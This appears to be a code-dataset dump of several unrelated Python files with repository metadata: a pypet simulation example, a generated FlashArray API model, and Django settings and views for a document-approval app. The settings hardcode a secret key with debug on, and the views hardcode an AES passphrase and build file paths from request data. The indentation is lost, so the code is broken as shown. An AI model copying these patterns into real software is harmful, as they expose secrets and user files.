np.array([0.01,0.01,0.01]),
np.array([2.02,0.02,0.02]),
np.array([42.0,4.2,0.42])
]})
# 3 different conditions are enough for an illustrative example
# 2nd phase let's run the experiment
# We pass `euler_scheme` as our top-level simulation function and
# the Lorenz equation 'diff_lorenz' as an additional argument
env.f_run(euler_scheme, diff_lorenz)
# We don't have a 3rd phase of post-processing here
# 4th phase analysis.
# I would recommend to do post-processing completely independent from the simulation,
# but for simplicity let's do it here.
# Let's assume that we start all over again and load the entire trajectory new.
# Yet, there is an error within this approach, do you spot it?
del traj
traj = Trajectory(filename='experiments/example_05/HDF5/example_05.hdf5')
# We will only fully load parameters and derived parameters.
# Results will be loaded manually later on.
try:
# However, this will fail because our trajectory does not know how to
# build the FunctionParameter. You have seen this coming, right?
traj.f_load(name=trajectory_name,load_parameters=2,
load_derived_parameters=2,load_results=1)
except ImportError as e:
print 'That did\'nt work, I am sorry. %s ' % e.message
# Ok, let's try again but this time with adding our parameter to the imports
traj = Trajectory(filename='experiments/example_05/HDF5/example_05.hdf5',
dynamically_imported_classes=FunctionParameter)
# Now it works:
traj.f_load(name=trajectory_name,load_parameters=2,
load_derived_parameters=2,load_results=1)
#For the fun of it, let's print the source code
print '\n ---------- The source code of your function ---------- \n %s' % traj.diff_eq
# Let's get the exploration array:
initial_conditions_exploration_array = traj.f_get('initial_conditions').f_get_range()
# Now let's plot our simulated equations for the different initial conditions:
# We will iterate through the run names
for idx, run_name in enumerate(traj.f_get_run_names()):
#Get the result of run idx from the trajectory
euler_result = traj.results.f_get(run_name).euler_evolution
# Now we manually need to load the result. Actually the results are not so large and we
# could load them all at once. But for demonstration we do as if they were huge:
traj.f_load_item(euler_result)
euler_data = euler_result.data
#Plot fancy 3d plot
fig = plt.figure(idx)
ax = fig.gca(projection='3d')
x = euler_data[:,0]
y = euler_data[:,1]
z = euler_data[:,2]
ax.plot(x, y, z, label='Initial Conditions: %s' % str(initial_conditions_exploration_array[idx]))
plt.legend()
plt.show()
# Now we free the data again (because we assume its huuuuuuge):
del euler_data
euler_result.f_empty()
# You have to click through the images to stop the example_05 module!
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
18f7fd778281764630b6d87c06f297330644c9a1 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/reference_with_type.py | 686da10b71d57d6ece1d116f5a7668ce8c35aa23 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,557 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ReferenceWithType(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'resource_type': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'resource_type': 'resource_type'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
resource_type=None, # type: str
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified.
name (str): The resource name, such as volume name, pod name, snapshot name, and so on.
resource_type (str): Type of the object (full name of the endpoint). Valid values are `hosts`, `host-groups`, `network-interfaces`, `pods`, `ports`, `pod-replica-links`, `subnets`, `volumes`, `volume-snapshots`, `volume-groups`, `directories`, `policies/nfs`, `policies/smb`, and `policies/snapshot`, etc.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if resource_type is not None:
self.resource_type = resource_type
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferenceWithType, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferenceWithType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
0f7ec680721030d047f06b1b94341a7c982454b5 | 402ef712e2d98bb616e64eb7d57145a643ad61d7 | /backend/mobile_testing_app__15569/wsgi.py | 7832e8909382ddeb029a4fbf984861ab927942fb | [] | no_license | crowdbotics-apps/mobile-testing-app--15569 | ce5299c1dc7b5ebf531043dbe7614c7206880ce0 | 5c6e5f045a9ba80592e81584ac7c88ea53eabdfa | refs/heads/master | 2023-01-24T21:54:07.548231 | 2020-11-24T06:01:05 | 2020-11-24T06:01:05 | 315,533,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | """
WSGI config for mobile_testing_app__15569 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_testing_app__15569.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
235f40b873b377065055784a18c708cd33c11a20 | dbdb9b2102b25808f0363d50ff85626921b1c70a | /rest_api_3_product/settings.py | baee96ac579b1af253e75334bad35faaa15bf71c | [] | no_license | vinodkumar96/rest_api_3_product | dee834e704c25c812ba94a682641ab7f9bcabd44 | b0be03b80d7b59ef4d81e02f977c5ed1df862709 | refs/heads/master | 2020-07-04T20:38:15.552542 | 2019-08-14T19:08:09 | 2019-08-14T19:08:09 | 202,409,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,242 | py | """
Django settings for rest_api_3_product project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd56v)@7t(80-417mdh)+3++!d5hd($la5m$w*b4xum9vjfnx)u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Rapp_3_ModelClass.apps.Rapp3ModelclassConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rest_api_3_product.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rest_api_3_product.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
adbd9301b5bda91c278b06fb2830f00b52df2ea7 | a3c970cb385cb4c6e2122b3c096f61ceb37b3acd | /defence/.history/dashboard/do_views_20191211183052.py | 90e0aa9f0297d160ed8d425b8692c054943d6df7 | [] | no_license | kirubasuba/certa | ec7cd06352ff9c477236afcead89daf9a28943bc | 111f2bdfd2626475951f5f86746f04f5fd42ded4 | refs/heads/master | 2022-12-14T03:44:20.207843 | 2020-05-19T12:36:15 | 2020-05-19T12:36:15 | 212,568,163 | 0 | 0 | null | 2022-11-22T04:41:30 | 2019-10-03T11:56:13 | Python | UTF-8 | Python | false | false | 29,600 | py | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.models import User,Group
from .forms import UserCreationForm,TAapplicationForm,cemilacUserForm,proforma_A_form,commentsUploadForm
from django.contrib import messages
from common.decorators import role_required
from authmgmt.models import registration
from .models import TAapplicationmodel,proforma_A_model,TAapplicationfiles,statusmodel,commentsmodel,idgenerationmodel
from django.template.loader import get_template
from xhtml2pdf import pisa
from django.http import HttpResponse
from .views import link_callback
import os
from os import stat, remove
import pyAesCrypt
from datetime import datetime
from django.utils import formats
import comtypes.client
import pythoncom
import urllib
from docx import Document
import io
from io import BytesIO,StringIO
# import io.StringIO
from django.core.files import File
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def process_proforma(request):
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
# @login_required(login_url=settings.LOGIN_URL)
# @role_required(allowed_roles=["TA Coordinator"])
# def checklist(request):
# reg=TAapplicationmodel.objects.all()
# return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["TA Applicant","Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def viewtyperecord(request,id):
print('saiiiiiiiiiiiiiii',id)
# reg=get_object_or_404(registration,id=id)
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# if request.method == 'POST':
# return render(request, 'dealing officer/newtypeapproval.html', {'form': form,})
# else:
# form = TAapplicationForm(instance=taa)
# template = get_template('applicant/newtypeapprovalpdf.html')
# context= {
# 'firmname':taa.firmname,
# 'addr1':taa.addr1,
# 'addr2':taa.addr2,
# 'tot':taa.tot,
# 'item_name':taa.item_name,
# 'part_no':taa.part_no,
# 'desc':taa.desc,
# 'spec': taa.spec,
# 'dal_mdi':taa.dal_mdi,
# 'bom':taa.bom,
# 'sop_acbs':taa.sop_acbs,
# 'pc': taa.pc,
# 'tre':taa.tre,
# 'otheritems':taa.otheritems
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
# return render(request, 'applicant/newtypeapprovalpdf.html', {'form': form,})
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
print(id,'kkk')
idprefix=request.POST['idprefix']
filename=request.POST['filename']
if filename!='':
comment=request.POST['comment']
if filename=="TAapplication.pdf":
tf=TAapplicationfiles.objects.filter(user_id=id,filecategory="TAapplication").first()
tf.comments=comment
tf.save()
pro=proforma_A_model.objects.all()
messages.success(request, 'Comments Successfully Submitted !')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+"/"+fc.idprefix+"Annexure 1/TAapplication/"
print(tafil,'tafile')
filename='TAapplication.pdf'
url='http://127.0.0.1:8000/media'+urllib.parse.quote(curr_path)+'TAapplication.pdf'
print(tafil.comments,'new')
return render(request, 'dealing officer/pdf viewer.html',{'url':url,'id':id,'filename':filename,'fc':tafil.comments,'idprefix':fc.idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def draft_ta(request,id):
doc_final_path ='E:/certa-drdo/certa/Draft_TA.docx'
pdf_final_path ='E:/certa-drdo/certa/Draft_TA.pdf'
final_path='E:/certa-drdo/certa/'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/Draft_TA.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'Draft_TA.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 7/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'Draft_TA.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
html = template.render(context)
doc_io = io.BytesIO() # create a file-like object
template.save("Draft_TA.docx") # save data to file-like object
new_path1 = 'E:\certa-drdo\certa\Draft_TA.docx'
output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 4.13').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
# curr_path = "/"+str(id)+ "/Annexure 4.13/PC/pc.docx.aes"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# templateDoc = Document(new_path1)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
print(request.user.id,'kkkkkkkk')
messages.success(request, 'Draft_TA Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id),file_in_name="TCS-DO")
print('reggggggg',reg)
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def data_sheet(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
doc_final_path ='E:/certa-drdo/certa/TA_Datasheet.docx'
final_path ='E:/certa-drdo/certa/'
# finalpath=final_path.replace('/','\\')
pdf_final_path ='E:/certa-drdo/certa/TA_Datasheet.pdf'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/TA_Datasheet.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'TA_Datasheet.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 6/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'TA Datasheet.docx', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/DS template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
html = template.render(context)
doc_io = io.BytesIO() # create a file-like object
template.save("TA_Datasheet.docx") # save data to file-like object
new_path1 = 'E:\certa-drdo\certa\TA_Datasheet.docx'
# output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 6').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
# templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
messages.success(request, 'Data_sheet Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def addproforma(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'kkkkkkkkkk')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
# tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+ fc.idprefix+"Annexure 3/Proforma_A/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
if os.path.isdir(new_path):
with open(new_path+'Proforma_A.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
print('sai',fc.user_id,fc.idprefix)
form = proforma_A_form(request=fc.user_id,idpre=fc.idprefix)
pro=proforma_A_model.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
taa=TAapplicationmodel.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
if pro:
template = get_template('dealing officer/proformapdf.html')
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
print(formatted_datetime,'dte')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='DAL_MDI',refid=fc.idprefix).first()
dalurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
dalurl='http://127.0.0.1:8000/media'+curr_path
print(dalurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='BOM',refid=fc.idprefix).first()
bomurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
bomurl='http://127.0.0.1:8000/media'+curr_path
print(bomurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='Tech_Spec',refid=fc.idprefix).first()
techspecurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
techspecurl='http://127.0.0.1:8000/media'+curr_path
print(techspecurl,'pppp11111pppppp')
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'addr2':taa.addr2,
'item_name':taa.item_name,
'part_no':taa.part_no,
'desc':taa.desc,
'dal_mdi':taa.dal_mdi,
'bom':taa.bom,
'sop_acbs':taa.sop_acbs,
'pc': taa.pc,
'tre':taa.tre,
'otheritems':taa.otheritems,
'dalurl':dalurl,
'bomurl':bomurl,
'techspecurl':techspecurl,
'ta': pro.ta,
'techspec': pro.techspec,
'qts': pro.qts,
'qtr': pro.qtr,
'cd': pro.cd,
'photo': pro.photo,
'feedback': pro.feedback,
'req': pro.req,
'cost': pro.cost,
'quantity': pro.quantity,
'pc': pro.pc,
'tacomments':pro.tacomments,
'datenow':formatted_datetime
}
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="report.pdf"'
html = template.render(context)
pisaStatus = pisa.CreatePDF(
html,dest=response,link_callback=link_callback)
if pisaStatus:
return HttpResponse(response,content_type='application/pdf')
# if error then show some funy view
if pisaStatus.err:
return HttpResponse('We had some errors <pre>' + html + '</pre>')
return response
else:
print(form.errors)
return render(request, 'dealing officer/proforma.html', {'form': form,'id':id,'idprefix':idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def generateproformapdf(request):
id=request.POST['id']
idprefix=request.POST['idprefix']
print('saiiiiiiiiiiiiiii',id)
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
# return render(request, 'dealing officer/proforma.html')
if request.method=='POST':
# firstname=request.POST['firstname']
# lastname=request.POST['lastname']
# country=request.POST['country']
# subject=request.POST['subject']
# reg=get_object_or_404(registration,id=id)
user=User.objects.get(pk=fc.user_id)
form = proforma_A_form(request.POST,request=fc.user_id,idpre=fc.idprefix)
if form.is_valid():
pro= form.save(commit=False)
pro.user = user
pro.idprefix=fc.idprefix
pro.save()
taapp_form=TAapplicationmodel.objects.filter(user_id=pro.user_id,idprefix=fc.idprefix).first()
print("pro_form",taapp_form.id)
get_taap_id=statusmodel.objects.filter(TAA_id=taapp_form.id).first()
get_taap_id.status='Ready_for_CL'
get_taap_id.Ready_for_CL=datetime.now()
get_taap_id.save()
print("status",get_taap_id)
messages.success(request, 'Proforma_A Successfully Prepared !')
return render(request, 'dealing officer/proforma.html')
# print('firstname',request.POST['firmname'])
# firmname=request.POST['firmname']
# template = get_template('dealing officer/proformapdf.html')
# context= {
# 'desc':request.POST['desc'],
# 'item_name':request.POST['item_name'],
# 'part_no':request.POST['part_no'],
# 'dal_mdi':request.POST['dal_mdi'],
# 'bom':request.POST['bom'],
# 'sop_acbs':request.POST['sop_acbs'],
# 'otheritems':request.POST['otheritems'],
# 'firmname':request.POST['firmname'],
# 'addr1':request.POST['addr1'],
# 'addr2':request.POST['addr2'],
# 'ta': request.POST['ta'],
# 'techspec': request.POST['techspec'],
# 'qts': request.POST['qts'],
# 'qtr': request.POST['qtr'],
# 'cd': request.POST['cd'],
# 'tre': request.POST['tre'],
# 'photo': request.POST['photo'],
# 'feedback': request.POST['feedback'],
# 'req': request.POST['req'],
# 'cost': request.POST['cost'],
# 'quantity': request.POST['quantity'],
# 'pc': request.POST['pc'],
# 'tacomments':request.POST['tacomments']
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
else:
print(form.errors)
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def rowselect(request,id):
form=commentsUploadForm
print('if',id)
idprefix=request.POST['idprefix']
print(idprefix,'idprefix')
taf=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).order_by('refpath').first()
get_refpath=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).values('refpath').order_by('refpath')
idg=idgenerationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(get_refpath,'taff')
